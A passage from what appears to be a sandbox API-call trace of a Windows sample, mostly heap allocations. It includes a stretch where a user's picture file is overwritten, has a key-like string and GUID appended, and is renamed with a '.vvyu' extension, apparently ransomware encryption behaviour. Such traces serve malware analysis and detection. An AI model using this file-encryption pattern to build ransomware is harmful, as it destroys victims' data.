hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc98 | out: hHeap=0x6a0000) returned 1 [0187.633] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0187.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0187.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0187.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0187.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0187.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0187.634] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0187.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0187.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0187.635] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0187.635] WriteFile (in: hFile=0x584, lpBuffer=0x2d43778*, nNumberOfBytesToWrite=0xb2e7, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d43778*, lpNumberOfBytesWritten=0x30ffb14*=0xb2e7, lpOverlapped=0x0) returned 1 [0187.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d43778 | out: hHeap=0x6a0000) returned 1 [0187.637] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xb2ec, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0187.637] WriteFile (in: hFile=0x584, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0187.637] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0187.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c6fdf8 [0187.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d42908 [0187.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d42908, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0187.637] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42d38 [0187.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c6fdf8 | out: hHeap=0x6a0000) returned 1 [0187.638] WriteFile (in: hFile=0x584, lpBuffer=0x2d42d38*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42d38*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0187.639] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42d38 | out: hHeap=0x6a0000) returned 1 [0187.639] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0187.639] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0187.639] CloseHandle (hObject=0x584) returned 1 [0187.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b7a8 [0187.642] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x880) returned 0x2d42908 [0187.643] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b7a8 | out: hHeap=0x6a0000) returned 1 [0187.643] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\WZMKMOpOZYAgO-UJTDf.bmp" (normalized: "c:\\users\\keecfmwgj\\pictures\\wzmkmopozyago-ujtdf.bmp"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\WZMKMOpOZYAgO-UJTDf.bmp.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\wzmkmopozyago-ujtdf.bmp.vvyu")) returned 1 [0187.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.644] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.645] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0187.648] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b6b8 | out: hHeap=0x6a0000) returned 1 [0187.648] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85824980, ftCreationTime.dwHighDateTime=0x1d8a3a1, ftLastAccessTime.dwLowDateTime=0x668dc460, ftLastAccessTime.dwHighDateTime=0x1d8a477, ftLastWriteTime.dwLowDateTime=0x668dc460, ftLastWriteTime.dwHighDateTime=0x1d8a477, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ymOmNEPhoB", cAlternateFileName="YMOMNE~1")) returned 1 [0187.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c827f8 [0187.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.648] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82b68 [0187.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.649] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0187.649] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x85824980, ftCreationTime.dwHighDateTime=0x1d8a3a1, ftLastAccessTime.dwLowDateTime=0x668dc460, ftLastAccessTime.dwHighDateTime=0x1d8a477, ftLastWriteTime.dwLowDateTime=0x668dc460, ftLastWriteTime.dwHighDateTime=0x1d8a477, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ymOmNEPhoB", cAlternateFileName="YMOMNE~1")) returned 0 [0187.649] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0187.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0187.650] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c9f4c8 | out: hHeap=0x6a0000) returned 1 [0187.650] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0187.650] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0187.650] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0187.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.651] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.651] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.652] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.652] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.653] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.653] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.654] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0187.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.655] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.655] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.656] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.656] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.657] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.657] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.658] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.658] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.660] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.662] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.662] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.663] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.664] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.664] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.665] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.667] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.667] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d2ec90 [0187.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.668] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.668] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.669] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.669] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.670] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.671] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.672] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.673] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.673] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.674] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.674] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.675] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.675] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.676] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.676] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.677] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.677] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38d90 | out: hHeap=0x6a0000) returned 1 [0187.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38d90 [0187.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.678] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.678] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 